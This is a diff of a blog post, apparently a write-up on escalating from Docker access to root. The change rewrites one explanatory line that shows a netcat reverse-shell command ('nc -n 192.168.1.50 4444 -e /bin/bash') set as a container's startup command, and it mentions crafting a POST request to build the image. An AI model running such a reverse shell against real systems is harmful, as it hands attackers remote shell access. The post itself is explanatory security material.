fusionx3/fusionx3.github.io/_posts/2017-10-09-Escalation-From-Docker-To-Root-Access.md

 ```

 Note
 > CMD is the command that is to executed upon the startup of the container.
-In our case, it's just like running `nc -n xx.xx.xx.xx 444 -e /bin/bash` in the container system.
+In our case, it's just like running `nc -n 192.168.1.50 4444 -e /bin/bash` in the container system, which is going to connect to the IP `192.168.1.50` on port `4444` and redirect all the input into the bash shell.

 Afterwards, we start to craft the POST request and the JSON object needed in order to build our image.